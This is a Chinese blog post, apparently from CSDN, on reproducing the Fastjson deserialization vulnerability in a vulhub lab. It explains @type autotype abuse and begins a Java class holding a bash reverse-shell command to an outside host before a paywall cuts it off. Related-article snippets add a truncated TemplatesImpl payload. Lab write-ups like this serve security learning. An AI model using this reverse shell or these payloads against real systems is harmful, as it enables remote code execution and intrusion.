Fastjson 反序列化漏洞复现

最新推荐文章于 2025-07-14 12:54:12 发布
原创 最新推荐文章于 2025-07-14 12:54:12 发布 · 5.4k 阅读 · 10 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

本文详细介绍了Fastjson的反序列化漏洞,包括漏洞原理、复现过程以及利用方法。通过示例展示了如何在fastjson 1.2.24和1.2.47版本中触发漏洞,同时提到了利用RMI服务和Java 8环境进行漏洞复现的步骤。此外,还探讨了Fastjson漏洞的探测方法,如DNS日志检查和payload探测,并给出了Java 8的安装指南。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

Fastjson 反序列化漏洞复现

前言

因为之前并没有遇到过fastjson相关的漏洞,刚好这次有机会碰到了就顺便学习一下并记录自己踩过的坑。

漏洞描述

fastjson提供了autotype功能,在请求过程中,我们可以在请求包中通过修改@type的值,来反序列化为指定的类型,而fastjson在反序列化过程中会设置和获取类中的属性,如果类中存在恶意方法,就会导致代码执行等这类问题。

漏洞复现

这里漏洞环境主要是用vulhub上的两个fastjson漏洞搭建,搭建完成以后访问8090端口会出现如下所示
在这里插入图片描述
漏洞利用需要我们在vps上启一个RMI服务并调用class文件,这些我们都可以在一台服务器上完成。
首先我们先创建命令执行代码,执行命令反弹shell,创建test.java,使用命令javac test.java编译生成test.class(整个实验环境都是基于java8的基础上)

import java.lang.Runtime;
import java.lang.Process;

public class test {
   
   
    static {
   
   
        try {
   
   
            Runtime rt = Runtime.getRuntime();
            String[] commands = {
   
   "bash", "-c", "bash -i >& /dev/tcp/59.110.xx.xx/8002 0>&1"};
            Process pc = r
最低0.47元/天 解锁文章

200万优质内容无限畅学
FASTJSON反序列化(靶场复现)
m0_66376444的博客
04-06 785
FASTJSON反序列化漏洞复现fastjson的各个版本payload虽有区别,但是漏洞利用是一样的
fastjson反序列化漏洞复现
余十步的博客
06-05 491
靶机IP:192.168.253.134攻击机IP:192.168.142.44。
sqli-labs靶场通关笔记:第10关 DNSlog盲注
最新发布
CL1799438883的博客
07-14 500
DNSlog注入需要依赖load_file() 函数,它的作用是读取文件内容,作为字符串返回。需要配置文件my.ini中secure_file_priv=(空),如果secure_file_priv=NULL,load_file() 函数会被禁用。DNSlog注入,又称DNS带外(DNS Out-of-Band,简称 DNS OOB)注入。通过语句测试发现,只有一种页面回显,为双引号闭合,可以使用时间盲注。这是一个 DNS 日志平台,可以捕获目标服务器发起的 DNS 查询请求。4.获取字段中数据,完成。
【网络安全】Fastjson反序列化漏洞复现
kali_Ma的博客
12-26 2932
Fastjson提供了autotype功能,允许用户在反序列化数据中通过“@type”指定反序列化的类型,Fastjson自定义的反序列化机制时会调用指定类中的setter方法及部分getter方法,那么当组件开启了autotype功能并且反序列化不可信数据时,攻击者可以构造数据,使目标应用的代码执行流程进入特定类的特定setter或者getter方法中,若指定类的指定方法中有可被恶意利用的逻辑(也就是通常所指的“Gadget”),则会造成一些严重的安全问题。
Fastjson漏洞分析与复现
未完成的歌~的博客
08-26 1845
fastjson是阿里巴巴开源的JSON解析库,它可以解析JSON格式的字符串,支持将Java Bean序列化为JSON字符串,也可以从JSON字符串反序列化到JavaBean。即fastjson的主要功能就是将Java Bean序列化成JSON字符串,这样得到字符串之后就可以通过数据库等方式进行持久化了。
Fastjson<=1.2.47反序列化漏洞复现
m0_48520508的博客
07-28 1016
0x01简介 fastjson 是阿里巴巴的开源JSON解析库,它可以解析 JSON 格式的字符串,支持将 Java Bean 序列化为 JSON 字符串,也可以从 JSON 字符串反序列化到 JavaBean。 FastJson特点如下: (1)能够支持将java bean序列化成JSON字符串,也能够将JSON字符串反序列化成Java bean。 (2)顾名思义,FastJson操作JSON的速度是非常快的。 (3)无其他包的依赖。 (4)使用比较方便。 0x02漏洞介绍 Fastjson提供了aut
Fastjson反序列化漏洞原理与漏洞复现(基于vulhub靶场)
人若无名,便可专心练剑
03-27 5683
Fastjson反序列化漏洞也是一个知名度比较高的Java反序列化漏洞,他是阿里巴巴的开源库,下面我将主要带大家了解Fastjson反序列化漏洞的原理以及相关知识点的内容,然后带师傅们去利用rmi服务去复现这个Fastjson反序列化漏洞!!!
Fastjson反序列化漏洞复现
aa1281047341的博客
08-21 203
Fastjson-1.2.47-rce-反序列化漏洞复现
Fastjson反序列化漏洞复现(实战案例)
热门推荐
1
04-19 1万+
漏洞介绍 FastJson在解析json的过程中,支持使用autoType来实例化某一个具体的类,并调用该类的set/get方法来访问属性。通过查找代码中相关的方法,即可构造出一些恶意利用链。 通俗理解就是:漏洞利用fastjson autotype在处理json对象的时候,未对@type字段进行完全的安全性验证,攻击者可以传入危险类,并调用危险类连接远程rmi主机,通过其中的恶意类执行代码。攻击者通过这种方式可以实现远程代码执行漏洞的利用,获取服务器的敏感信息泄露,甚至可以利用此漏洞进一步对服务器数据
Fastjson反序列化漏洞部署复现1.2.24版本序列RCE笔记
weixin_51339377的博客
11-09 1096
但是mvn clean package -DskipTests执行需要一个环境变量JAVA_HOME,且对应的地址是jdk文件夹,不带bin。之后rmi服务器从kali的4444端口去取恶意类 返回给rmi服务器 rmi服务器再返回给8090的fastjson执行。总结:所有的java的jdk jre也好 全都直接在path中设置绝对路径。最终通过刚才的工具 启动一个rmi服务器 加载刚才设置的恶意类。设置ip地址为可以访问到的 通过http进行访问测试。会先通过rmi请求到win10的rmi服务器。
漏洞复现fastjson反序列化漏洞1.2.24/1.2.47
weixin_45556536的博客
11-04 1016
fastjson-反序列化漏洞1.2.24/1.2.47基础知识漏洞原理影响版本复现思路复现Fastjson1.2.24复现Fastjson1.2.45/1.2.47 基础知识 Fastjson 是阿里巴巴的开源JSON解析库,它可以解析 JSON 格式的字符串,支持将 Java Bean 序列化为 JSON 字符串,也可以从 JSON 字符串反序列化到 JavaBean。 反序列化常用的两种利用方式,一种是基于rmi,一种是基于ldap。RMI是一种行为,指的是Java远程方法调用。 漏洞原理 Fas
【超详细】Fastjson1.2.24反序列化漏洞复现
SuPejkj的博客
10-20 3561
0x01 前言 Fastjson一个 Java 库,可以将 Java 对象转换为 JSON 格式,当然它也可以将 JSON 字符串转换为 Java 对象。 Fastjson 可以操作任何 Java 对象,即使是一些预先存在的没有源码的对象。 Fastjson 特性: 提供服务器端、安卓客户端两种解析工具,性能表现较好。 提供了 toJSONString() 和 parseObject() 方法来将 Java 对象与 JSON 相互转换。调用toJSONString方 法即可将对象转换成 JSON 字符.
fastjson1.2.24反序列化漏洞复现 CVE-2017-18349
m0_62284238的博客
09-10 1850
fastjson反序列化漏洞复现 CVE-2017-18349
fastjson复现
qq_42133828的博客
07-13 1980
fastjson2017-0315远程代码执行漏洞复现 漏洞名称: fastjson远程命令执行漏洞 漏洞类型: 远程代码执行漏洞 漏洞危害: 高危 漏洞来源: https://github.com/alibaba/fastjson/wiki/security_update_20170315 公布时间: 2017-03-15 涉及应用版本: fastjson小于1.2.24的所有版本 poc适用于...
fastjson反序列化漏洞_【漏洞复现fastjson反序列化漏洞
weixin_39969611的博客
11-30 273
0x00影响版本fastjson< 1.2.480x01 漏洞原理 Fastjson是阿里巴巴的开源JSON解析库,它可以解析JSON格式的字符串,支持将Java Bean序列化为JSON字符串,也可以从JSON字符串反序列化到JavaBean。通过java.lang.Class,将JdbcRowSetImpl类加载到map缓存,从而绕过autotype的检测。因此...
FastJson反序列化漏洞复现
小赵同学的博客
07-29 4195
漏洞利用FastJson autotype处理Json对象的时候,未对@type字段进行完整的安全性验证,攻击者可以传入危险类,并调用危险类连接远程RMI主机,通过其中的恶意类执行代码。攻击者通过这种方式可以实现远程代码执行漏洞,获取服务器敏感信息,甚至可以利用此漏洞进一步的对服务器数据进行操作。......
Fastjson1.0漏洞复现
qq_38415434的博客
12-29 1389
服务器kali linux 攻击机win10 搭建好环境之后,测试漏洞 证明存在漏洞 生成payload {"@type":“com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl”,"_bytecodes":[“yv66vgAAADQAsAcAAgEAF2NvbS9zZWNmcmVlL3d3dy9QYXlsb2FkBwAEAQBAY...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值